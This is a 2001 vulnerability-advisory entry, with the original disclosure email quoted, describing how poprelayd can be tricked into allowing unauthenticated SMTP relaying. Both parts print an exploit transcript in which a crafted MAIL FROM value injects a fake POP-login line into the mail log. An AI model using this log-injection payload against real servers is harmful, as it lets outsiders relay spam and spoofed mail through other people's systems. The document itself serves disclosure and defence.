Poprelayd E-mail Relaying Security Utility Lets Remote Users Relay Mail via SMTP Without Authenticating
|
Date: Jul 4 2001 20:14 (UTC/GMT)
|
Impact: Host/resource access via network
|
Exploit Included: Yes
|
Description: A vulnerability has been reported in poprelayd that allows remote users to avoid the security checking mechanism and send relayed mail without authenticating.
Poprelayd is a program that monitors POP3 and IMAP user authentication logs (/var/log/maillog) and allows hosts that have successfully
authenticated to relay mail via sendmail for a short period of time.
The syslog string searched by the script is in the following
form for the qpop server:
/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)
On some servers, it is reportedly possible
for a remote user to insert a certain string into the mail log such that it will fool the poprelayd utility into thinking that a
particular host ip address has been successfully authenticated. This will allow that host ip address to send relayed SMTP mail.
An
exploit transcript follows:
telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail
from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain
name required
At this point, the IP address 66.66.66.66 can use the SMTP relay.
|
Impact: A remote user can send mail via the SMTP relay without authenticating.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: sourceforge.net/projects/poprelay (Links to External Site)
|
Cause: State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Andrea Barisani <lcars@infis.univ.trieste.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
From: Andrea Barisani <lcars@infis.univ.trieste.it>
Subject: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
|
Hi to all,
Poprelayd is a simple script that scan /var/log/maillog for valid pop
logins and updates a hash db used by sendmail to permit relaying for
those valid pop users, this method is called "Pop-before-smtp".
The syslog string searched by the script is in this form for the qpop
server
/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)
On some cobalt raq3 servers (with the poprelayd add-on packet installed )
and in general on any system running the poprelayd script with sendmail is
possible to "inject" this string in the syslog using sendmail logging. So
anyone can insert a fake string with his own IP wich will be parsed by
poprelayd and that will permit the use of sendmail as a relay.
On cobalts the presence of poprelayd is revealed by the modified sendmail
relaying denied message "Relaying denied. Please check your mail first."
Example:
telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
now the IP 66.66.66.66 can do relay :)
in fact, on dumbcobalt:
in /var/log/maillog
...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org", size=0, class=0 ....etc etc...
[root@dumbcobalt /]# /usr/sbin/poprelayd -p
66.66.66.66 7
;-)
Bye
------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics - University of Trieste
lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be,'said the Cat,'or you wouldn't have come here."
------------------------------------------------------------
|
|
